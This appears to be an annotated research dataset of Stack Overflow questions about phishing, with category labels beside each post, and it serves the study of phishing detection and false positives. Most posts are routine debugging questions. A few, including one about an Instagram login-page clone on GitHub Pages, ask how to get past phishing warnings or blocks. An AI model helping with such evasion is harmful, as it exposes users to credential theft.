    <t>&lt;selenium&gt;&lt;google-chrome&gt;&lt;java-8&gt;&lt;selenium-chromedriver&gt;&lt;ubuntu-16.04&gt;</t>
  </si>
  <si>
    <t>Dealing with available datasets</t>
  </si>
  <si>
    <t>How to split strings from a CSV column into a list?</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to make a list out of the words of a CSV column called 'text' that is composed of strings&lt;/p&gt;
 &lt;p&gt;This is what I have:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;def html_words():
  legits_text = pd.read_csv('/Users/pmpilla/Documents/phishing/html_text.csv', delimiter=',')
  list_text = legits_text["text"].split(" ")
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This is the error that I am getting:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;gt; Traceback (most recent call last):
  File "/Users/pmpilla/Documents/phishing/html_words/legit_path_words.py", line 70, in &amp;lt;module&amp;gt;
  html_words()
  File "/Users/pmpilla/Documents/phishing/html_words/legit_path_words.py", line 30, in html_words
  list_text = legits_text["text"].split(" ")
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/pandas/core/generic.py", line 3614, in __getattr__
  return object.__getattribute__(self, name)
 AttributeError: 'Series' object has no attribute 'split'
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;string&gt;&lt;python-3.x&gt;&lt;pandas&gt;&lt;dataframe&gt;</t>
  </si>
  <si>
    <t>How to make an android app written in jQuery Mobile and Phonegap</t>
  </si>
  <si>
    <t>&lt;p&gt;Im new to web development and app development. I can make apps using html5 and css3 with no problem. But when i use jquery mobile the app doesnt display properly. How can i fix it. This is the code i have used&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
 &amp;lt;html&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&amp;gt;
  &amp;lt;meta name="viewport" content="width=device-width, user-scalable=no"&amp;gt;
  &amp;lt;title&amp;gt;Test App&amp;lt;/title&amp;gt;
  &amp;lt;link rel="stylesheet" href="css/themes/default/jquery.mobile-1.3.2.min.css"&amp;gt;
  &amp;lt;link rel="stylesheet" href="_assets/css/jqm-demos.css"&amp;gt;
  &amp;lt;link rel="stylesheet" href="css/glyphish.css.css"&amp;gt;
  &amp;lt;!-- &amp;lt;link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans:300,400,700"&amp;gt; --&amp;gt;
  &amp;lt;script src="js/jquery.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src="_assets/js/index.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src="js/jquery.mobile-1.3.2.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" charset="utf-8"
  src="cordova/cordova.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;style&amp;gt;
  .background {background:url(_assets/img/background.jpg)}
  .toparea {background:#FFF}
  .toparea { padding-top: 0.2px !important; padding-bottom: 0.2px !important }
  .toparea {alignment-adjust:middle !important; }
  &amp;lt;/style&amp;gt;
  &amp;lt;style&amp;gt;
  .nav-glyphish-example .ui-btn .ui-btn-inner { padding-top: 40px !important; }
  .nav-glyphish-example .ui-btn .ui-icon { width: 30px!important; height: 30px!important; margin-left: -15px !important; box-shadow: none!important; -moz-box-shadow: none!important; -webkit-box-shadow: none!important; -webkit-border-radius: 0 !important; border-radius: 0 !important; }
  #chat .ui-icon { background: url(_assets/img/glyphish-icons/53-house.png) 50% 50% no-repeat; background-size: 22px 22px; }
  #email .ui-icon { background: url(_assets/img/glyphish-icons/157-wrench.png) 50% 50% no-repeat; background-size: 24px 24px; }
  #login .ui-icon { background: url(_assets/img/glyphish-icons/42-photos.png) 50% 50% no-repeat; background-size: 22px 24px; }
  #beer .ui-icon { background: url(_assets/img/glyphish-icons/80-shopping-cart.png) 50% 50% no-repeat; background-size: 26px 19px; }
  #coffee .ui-icon { background: url(_assets/img/glyphish-icons/18-envelope.png) 50% 50% no-repeat; background-size: 24px 16px; }
  &amp;lt;/style&amp;gt; 
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
 &amp;lt;section data-role="page" class="background" id="home"&amp;gt;
  &amp;lt;div class="toparea" data-theme="d" data-position="persistent"&amp;gt;
  &amp;lt;h1&amp;gt;Test App&amp;lt;/h1&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-theme="d" data-role="footer" class="nav-glyphish-example" data-position="fixed"&amp;gt;
  &amp;lt;div data-role="navbar" class="nav-glyphish-example" data-grid="d"&amp;gt;
  &amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="index.html" class="ui-btn-active" data-transition="flow" id="chat" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="services.html" data-transition="flow" id="email" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="gallery.html" data-transition="flow" id="login" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="products.html" data-transition="flow" id="beer" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="contact.html" data-transition="flow" id="coffee" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
 &amp;lt;/section&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I hope that you can help me.&lt;/p&gt;
 &lt;p&gt;Regards&lt;/p&gt;
 &lt;p&gt;Michael&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;jquery&gt;&lt;jquery-mobile&gt;&lt;cordova&gt;&lt;phonegap-build&gt;</t>
  </si>
  <si>
    <t>How to Connect to Okta LDAP?</t>
  </si>
  <si>
    <t>&lt;p&gt;So, I have an LDAP directory with Okta set up. I am having trouble connecting to it using PHP. Here's my code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$domain = 'phishingboxdecember15thaccount.ldap.okta.com';
 $username = 'USERNAME';
 $password = 'PASSWORD';
 $ldapconfig['host'] = '44.234.52.17'; // I got this by pinging the domain. I guess that's correct?
 $ldapconfig['port'] = 636;
 $ldapconfig['basedn'] = 'dc=phishingboxdecember15thaccount,dc=okta,dc=com';
 $ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']);
 ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
 ldap_set_option($ds, LDAP_OPT_REFERRALS, 0);
 $dn=&amp;quot;ou=users,&amp;quot;.$ldapconfig['basedn'];
 $bind=ldap_bind($ds, $username .'@' .$domain, $password);
 print_r($bind);
 $isITuser = ldap_search($bind,$dn,'(&amp;amp;(objectClass=User)(sAMAccountName=' . $username. '))');
 if ($isITuser) {
  echo(&amp;quot;Login correct&amp;quot;);
 } else {
  echo(&amp;quot;Login incorrect&amp;quot;);
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Yet this never works. Always get &amp;quot;Login incorrect&amp;quot;, and I am certain that I'm using the correct password (although, I'm not sure about the username part - I just use the username I enter to login to my Okta admin account, I'm assuming that's correct?).&lt;/p&gt;
 &lt;p&gt;Do you have any ideas/tips on how I can connect to the Okta LDAP using PHP?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;ldap&gt;&lt;okta&gt;&lt;idp&gt;</t>
  </si>
  <si>
    <t>Learning basics about phishing and filtering</t>
  </si>
  <si>
    <t>How to prevent phishing sites from being uploaded on shared server?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have more than 1000+ clients are having websites using various CMSs.
 Mainly using Wordpress and Joomla, These sites are getting hacked and phishing sites are uploaded.
 Please let us know how shall we prevent it.&lt;/p&gt;
 &lt;p&gt;We already have maldet running on the server. But it doesn't detects many phishing folders as it is mainly in html format.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;cpanel&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Cannot stop emails spoofing their domain</t>
  </si>
  <si>
    <t>How to stop automatic sending of phishing emails from web application?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have some web applications,hosted in different domains.&lt;/p&gt;
 &lt;p&gt;But users are reporting that they are getting phishing emails from those.
 What may be the reason behind that and most importantly,how would I stop these?&lt;/p&gt;
 &lt;p&gt;Can HTTPS/SSL help me out?
 Plz help.&lt;/p&gt;
 &lt;p&gt;N.B. : I'm using PHP,MySQL here.&lt;/p&gt;
 &lt;p&gt;Thanks in advance&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;email&gt;&lt;web-applications&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>False positive detection (askers are detected users)</t>
  </si>
  <si>
    <t>Blocked website by phishing detection</t>
  </si>
  <si>
    <t>Phishing alert on github-pages</t>
  </si>
  <si>
    <t>&lt;p&gt;could anyone help me ?
 I have twenty alerts on my github.io using github pages, and I don't know what to do to resolve this, I made a clone of the instagram page, and now I have this alert,
 check the url: &lt;a href="https://luuan11.github.io/instagram-login-page/" rel="nofollow noreferrer"&gt;https://luuan11.github.io/instagram-login-page/&lt;/a&gt;
 On virusTotal: &lt;a href="https://www.virustotal.com/gui/url-analysis/u-e8f3c7032425be44a9a55a75bc2be1e55bc00b77ac4c257ea6371f605c5c86d6-1670341085" rel="nofollow noreferrer"&gt;https://www.virustotal.com/gui/url-analysis/u-e8f3c7032425be44a9a55a75bc2be1e55bc00b77ac4c257ea6371f605c5c86d6-1670341085&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Something to remove this alerts&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;github-pages&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Legit emails go to junk</t>
  </si>
  <si>
    <t>Can't send email to custom domain</t>
  </si>
  <si>
    <t>&lt;p&gt;I have an issue where I can't receive email at certain domains. I believe it's most likely down to spam detection so I have checked headers are set correctly. However I'm still not receiving the emails at certain domains.&lt;/p&gt;
 &lt;p&gt;Example:&lt;/p&gt;
 &lt;p&gt;Let's say my sending domain is: &lt;code&gt;diggersworld.com&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;My PHP is setup like so:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;// general data
 $recipient = '...';
 $subject = '...';
 $message = '...';
 // set headers
 $headers = array();
 $headers[] = "MIME-Version: 1.0";
 $headers[] = "Content-type: text/plain; charset=iso-8859-1";
 $headers[] = "From: Diggersworld &amp;lt;info@diggersworld.com&amp;gt;";
 $headers[] = "X-Mailer: PHP/".phpversion();
 // send email
 if (mail($recipient, $subject, $message, implode("\r\n", $headers))) {
  ...
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I can receive the emails with Hotmail, I'm guessing their spam scanning is more relaxed. But when sending to a custom domain it's not getting there.&lt;/p&gt;
 &lt;p&gt;I've tried sending a bare bones &lt;code&gt;mail()&lt;/code&gt; with no headers. Again it made it to Hotmail, but not a custom domain.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;email&gt;&lt;sender&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>FaFalse positive detection (askers are detected users)</t>
  </si>
  <si>
    <t>Scraping is caought</t>
  </si>
  <si>
    <t>cURL proxy treated as a phishing Website</t>
  </si>
  <si>
    <t>&lt;p&gt;I have seen many proxies being able to reach Facebook without any warning from the Antivirus.
 Why does this code below (which is working) is treated as a Phishing Website for Antivirus like Kaspersky?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 $header = NULL;
 $url = "http://www.facebook.com";
 $cookie = NULL;
 $ch = curl_init();
  curl_setopt($ch, CURLOPT_HEADER, $header);
  curl_setopt($ch, CURLOPT_NOBODY, $header);
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  //curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);;
 curl_exec($ch);
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Thanks in advance.&lt;/p&gt;
 &lt;p&gt;PD: Antivirus isn't showing any warning for Twitter though.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;facebook&gt;&lt;curl&gt;</t>
  </si>
  <si>
    <t>Safari Warning: Possible Phishing Site - Send http request to an IFRAME ( Javascript )</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to perform action in &lt;code&gt;iframe&lt;/code&gt; that not visible to the user ( width 1 height 1 ).
 The following action(Javascript) is related to Webcam API:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;function down(){
 ifrResult.location = "http://"+user+":"+password+"@"+ip+":"+port+"/decoder_control.cgi?command=2&amp;amp;onestep=5";
 }
 function up(){
 ifrResult.location = "http://"+user+":"+password+"@"+ip+":"+port+"/decoder_control.cgi?command=0&amp;amp;onestep=5";
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As you can see the iframe id is ifrResult.&lt;br&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt;&lt;br&gt;
 On Chrome browser the action is performed without any issues but on Safari I get an error:&lt;br&gt;
 &lt;img src="https://i.stack.imgur.com/87bKv.png" alt="Warning Message"&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;
 Does anyone faced with this issue before? suggestions are welcomed, Thanks!&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;br&gt;
 For the avoidance of doubt, this is legal operation its just a wrapper for Webcam interface.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;iframe&gt;&lt;safari&gt;&lt;httprequest&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What might cause IE8 to show phishing warning page?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a situation where we took a client site online and for some reason, IE8 shows the bright red phishing page when you go to the site.&lt;/p&gt;
 &lt;p&gt;We have our normal Google Analytics code at the bottom of the page but we are also trying to track a poll in the middle of the page using Google Analytics. We're not sure if this might be the cause?&lt;/p&gt;
 &lt;p&gt;The other thing, which might be closer to the answer is that we had set the test site up on a sub domain on our own server when the client was doing QA testing before it went live.&lt;/p&gt;
 &lt;p&gt;Could this have been the cause for IE to pick up that it might be a phishing site?&lt;/p&gt;
 &lt;p&gt;Thanks in advance!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;internet-explorer-8&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Email phishing detection issue on GoDaddy / mailgun can it be connected with DMARC?</t>
  </si>
  <si>
    <t>&lt;p&gt;Some email clients consider our emails as a phishing (in Office 365). The only thing that was missing based on the &lt;a href="https://mxtoolbox.com/SuperTool.aspx?action=mx" rel="nofollow noreferrer"&gt;https://mxtoolbox.com/SuperTool.aspx?action=mx&lt;/a&gt; was DMARC entry missing.&lt;/p&gt;
 &lt;p&gt;I've added TXT DNS record like this (TTL 1hr):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;v=DMARC1;p=none;pct=100;rua=mailto:postmaster@mydomain.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Can it resolve the issue? Is there any specific action required to make it work with Mailgun / GoDaddy?&lt;/p&gt;
 &lt;p&gt;Thanks in advance for any help/info.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;webserver&gt;&lt;devops&gt;&lt;mailgun&gt;&lt;dmarc&gt;</t>
  </si>
  <si>
    <t>Asking if this is a way to evade antiphishing tools</t>
  </si>
  <si>
    <t>Do email clients mess up identifiers in links?</t>
  </si>
  <si>
    <t>&lt;p&gt;Through our platform I'm sending automatic emails with an unsubscribe link.&lt;/p&gt;
 &lt;p&gt;The unsubscribe has the following format:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;http://example.com/unsubscribe?id={id}&amp;amp;c={code}&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;The Id represents the UserId in the database, the Code is just some hash that is linked to the User (so people can't unsubscribe random people).&lt;/p&gt;
 &lt;p&gt;Problem is that I'm getting exceptions that &lt;strong&gt;the UserId does not match the database&lt;/strong&gt; (about 5-10%) - the Id is just way larger then the largest Id in our database.&lt;/p&gt;
 &lt;p&gt;Another weird thing is that the &lt;strong&gt;query parameters seem to be reversed&lt;/strong&gt;. It is suddenly &lt;code&gt;?c={code}&amp;amp;id={id}&lt;/code&gt; instead of &lt;code&gt;?id={id}&amp;amp;c={code}&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;The code is &lt;em&gt;really really&lt;/em&gt; simple, and I can't believe there is anything that can go wrong in constructing the original message. In a way there don't seem to be any other code paths.&lt;/p&gt;
 &lt;p&gt;I can come up with two &lt;em&gt;possible&lt;/em&gt; causes: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Some email tools mangle the url as some kind of anti spam / phishing / tracking / footprinting?&lt;/li&gt;
 &lt;li&gt;This is somehow related to character encoding going bad or something similar?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;But in a way I have no clue and I'm really at a loss here. I really would like to fix this, because the last thing I want to do is spam people by accident that can't unsubscribe.&lt;/p&gt;
 &lt;p&gt;Can anyone point me in the right direction?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html-email&gt;&lt;email&gt;</t>
  </si>
  <si>
    <t>cname redirect causing phishing warning in heroku</t>
  </si>
  <si>
    <t>&lt;p&gt;I changed my CNAME Records as outlined in this link &lt;a href="https://devcenter.heroku.com/articles/custom-domains" rel="nofollow"&gt;https://devcenter.heroku.com/articles/custom-domains&lt;/a&gt;. The redirect itself works, the issue is in Chrome (and I assume other browsers) It gives me a phishing alert. &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;This is probably not the site you are looking for!&lt;/p&gt;
  &lt;p&gt;You attempted to reach app.grewpr.com, but instead you actually reached a server i identifying itself as *.herokuapp.com. This may be caused by a misconfiguration on the server or by something more serious. An attacker on your network could be trying to get you to visit a fake (and potentially harmful) version of app.grewpr.com.&lt;/p&gt;
  &lt;p&gt;You should not proceed, especially if you have never seen this warning before for this site.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;How would I fix this error? It also puts a red line through the https lock.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ruby-on-rails&gt;&lt;heroku&gt;&lt;dns&gt;</t>
  </si>
  <si>
    <t>Phishing alert in Magento admin</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a very strange phishing alert in the magento admin of my website. It appear only on the &amp;quot;my account&amp;quot; page, without additionnal information on origin of this problem.&lt;/p&gt;
 &lt;p&gt;Except this page, the entire website work perfectly, the CMS is up to date (1.7.0.2) and I have no alert in google webmaster tools.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://imagesia.com/capture-du-2013-07-01-10-47-06_9hnc" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/iVaG8.png" alt="Capture du 2013-07-01 10 47 06 sur Imagesia" /&gt;&lt;/a&gt;&lt;br /&gt;
 &lt;sub&gt;(source: &lt;a href="http://img.imagesia.com/fichiers/9h/capture-du-2013-07-01-10-47-06_imagesia-com_9hnc_large.png" rel="nofollow noreferrer"&gt;imagesia.com&lt;/a&gt;)&lt;/sub&gt;&lt;/p&gt;
 &lt;p&gt;Thank you for your help.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;magento&gt;</t>
  </si>
  <si>
    <t>PHP Email Using SMTP going to spam</t>
  </si>
  <si>
    <t>&lt;p&gt;On my web application that is built using Yii 2 PHP,
 We send out emails using Swiftmailer&lt;/p&gt;
 &lt;p&gt;It is configured to connect to an SMTP server to send the email - to avoid problems. &lt;/p&gt;
 &lt;p&gt;The Emails are in HTML and do have a link in the body of the mail.
 On gmail accounts these emails go straight to the spam folder. 
 Any advice on how to fix this problem would be great please!&lt;/p&gt;
 &lt;p&gt;My Swiftmailer is configured as follow:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; 'mailer' =&amp;gt; [
  'class' =&amp;gt; 'yii\swiftmailer\Mailer',
  'useFileTransport'=&amp;gt;false,
  'transport' =&amp;gt; [
  'class' =&amp;gt; 'Swift_SmtpTransport',
  'host' =&amp;gt; 'mail.domainhere.com',
  'username' =&amp;gt; 'address@domainhere.com',
  'password' =&amp;gt; 'PASSWORDHERE',
  'port' =&amp;gt; '465',
  'encryption' =&amp;gt; 'ssl',
  ],
  ],
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When i send emails to my own gmail account i get this warning on the email:&lt;/p&gt;
 &lt;p&gt;Be careful with this message. Many people marked similar messages as phishing scams, so this might contain unsafe content&lt;/p&gt;
 &lt;p&gt;Thanks!
 Jason&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;email&gt;&lt;yii2&gt;&lt;gmail&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>Google marks emails sent from spreadsheet with MailApp.sendEmail as phishing scam</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using a variation of Google's MailApp.sendEmail() script ( &lt;a href="https://developers.google.com/apps-script/articles/sending_emails" rel="nofollow"&gt;https://developers.google.com/apps-script/articles/sending_emails&lt;/a&gt;) to send emails to addresses in a spreadsheet. To test the script I am sending them to another gmail account. However, the emails are being marked with the message: This message may not have been sent by: foo@gmail.com. Is there any way to avoid this? Thanks!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-apps-script&gt;</t>
  </si>
  <si>
    <t>Is there security issues with best practices, commonly used security practices</t>
  </si>
  <si>
    <t>New? think a problem in a code is a phishing protection?</t>
  </si>
  <si>
    <t>HttpServletRequest.getSession(false) returns null in webFilter</t>
  </si>
  <si>
    <t>&lt;p&gt;i have a JSF application running on Wildfly 10, and using a webfilter &lt;strong&gt;Filter.java&lt;/strong&gt; to check whether user is logged in(here showing the doFilter method):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;@WebFilter("/*")
 public class Filter implements javax.servlet.Filter {
 @Override
  public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
  throws ServletException, IOException {
  HttpServletRequest request = (HttpServletRequest) req;
  HttpServletResponse response = (HttpServletResponse) res;
  String requestURI = request.getRequestURI().replaceFirst(";.*", "");
  HttpSession session = request.getSession(false);
  if (session != null &amp;amp;&amp;amp; session.getAttribute("user") != null) {
  // User already logged in ...continue
  chain.doFilter(request, response);
  return;
  }
  if ("partial/ajax".equals(request.getHeader("Faces-Request"))) {
  // If ajax request, return special XML response instructing JSF ajax to send a redirect.
  response.setContentType("text/xml");
  response.setCharacterEncoding("UTF-8");
  response.getWriter().printf(LoginCheckFilter.AJAX_REDIRECT_XML, loginURL);
  } else {
  // User not logged in.Forward to login page
  response.sendRedirect(loginURL);
  }
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Additionally i have a SessionScoped Bean &lt;strong&gt;LoginBean.java&lt;/strong&gt;, to login a user. Each login creates a new session with getSession(true):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;@Named("loginBean")
 @SessionScoped
 @URLBeanName("loginBean")
 public class LoginBean extends BasePageBean {
  /**
  * Login user
  */
  public void login() {
  HttpSession session = getSession(true);
  try {
  // login and redirect to correct page ......
  } catch (Throwable t) {
  return;
  }
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;everything is working fine. But when i have logged in on one browser tab and i try to login on a second browser tab, i have to click login button twice to be able to login. Debugging, i see that with the first attempt&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; HttpSession session = request.getSession(false);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;in Filter.java returns Null and user is redirected to login page again, although loginBean has created a new Session with :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; HttpSession session = getSession(true);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Only when login button is clicked second time, the login succeeds. How can the session be null here although i am explicitly creating a new session in my loginBean for each login attempt. Is this some phishing protection? or does this have to do with the scope of the LoginBean? i am kind of stuck with this at the moment.&lt;/p&gt;
 &lt;p&gt;the &lt;strong&gt;getSession&lt;/strong&gt; method looks like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;public static HttpSession getSession(boolean newSession) {
  FacesContext facescontext = FacesContext.getCurrentInstance();
  if (facescontext == null)
  return null;
  ExternalContext contx = (ExternalContext) facescontext.getExternalContext();
  if (contx == null)
  return null;
  if (newSession) {
  contx.invalidateSession();
  }
  return (HttpSession) contx.getSession(true);
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Thanks &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;jsf-2&gt;&lt;jboss&gt;&lt;wildfly&gt;&lt;servlet-filters&gt;&lt;httpsession&gt;</t>
  </si>
  <si>
    <t>Exclude?</t>
  </si>
  <si>
    <t>Glide no loading Connection failed?</t>
  </si>
  <si>
    <t>&lt;p&gt;my site is blocked with google phishing. Now my data from Json works fine, but for some reason the &lt;code&gt;Glide&lt;/code&gt; cannot load the image from the link, since my site is blocked in Google, how can I bypass this block on the glide or can this be done through a file &lt;code&gt;network_security_config.xml&lt;/code&gt;?
 data is fine working from &lt;code&gt;Retrofit&lt;/code&gt; as JSON&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;image&gt;&lt;connection&gt;&lt;android-glide&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>No idea</t>
  </si>
  <si>
    <t>Facebook like button hijacking my url and changing it so something else?</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to add a facebook like button on &lt;code&gt;www.foldablehats.com&lt;/code&gt; to &lt;code&gt;www.foldablehats.com&lt;/code&gt; but despite the og tags and other markup the like comment references &lt;code&gt;http://education.apwg.org/r/en/index.htm&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://jsfiddle.net/mwJkv/" rel="nofollow"&gt;http://jsfiddle.net/mwJkv/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;What gives? When I change the markup to say google, it works fine. When I change it back to &lt;code&gt;www.foldablehats.com&lt;/code&gt; it redirects to some weird phishing link at &lt;code&gt;education.apwg.org&lt;/code&gt;. Has facebook flagged this url as phishing? I don't understand what is happening.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;facebook&gt;&lt;facebook-like&gt;&lt;facebook-social-plugins&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Mohammad's code</t>
  </si>
  <si>
    <t>Email validation links being clicked by anti-phising software</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm having a situation where it appears that some email validation links that I send as part of my registration process are being prematurely clicked by anti-phishing/anti-spam software. This validates the user account, removes that validation token, and logs the user in to the session. Then, when the actual user clicks the link in the HTML email, the site says that it cannot find the validation token.&lt;/p&gt;
 &lt;p&gt;Has anyone else experienced anything like this? Are there any tips to designing email validation registration workflows that can work with these type of anti-phishing software?&lt;/p&gt;
 &lt;p&gt;The user agents for hitting my own registration process are as follows&lt;/p&gt;
 &lt;p&gt;Real user registers:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;First robot hits validation link:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;"Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Another robot?:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Same robot as above but this time it includes a referrer (my break in the link):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; http: //cp.mcafee.com/d/1jWVIe4x0g3zqb3XWabWqq9KVJ6WrybPP8VASztdN4QsTvd7bNJ6WrybPP8VwSyyOUCMyOMedNBoDSJQDa0aFI43_zOVKCMgf-fbCQQ2310wU_R-jhj76zB-_nKnjjsuVxx5VNy_bnjIyyHt57BgY-F6lK1FJ4SyrLOtXTLuZXTdTdAVPmEBCjzJyF_KPVv8-hBivNMPYpeBI9nt741N1dV15N5RZRSPWtJ8mv8f
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This list goes on and on with the PhantomJS browser and the "Chrome/Safari/Edge" browser with the mcafee referrer bouncing back and forth until the real person clicks the link and gets presented with an error.&lt;/p&gt;
 &lt;p&gt;Has anyone ran into this problem created registration workflows?&lt;/p&gt;
 &lt;p&gt;UPDATE
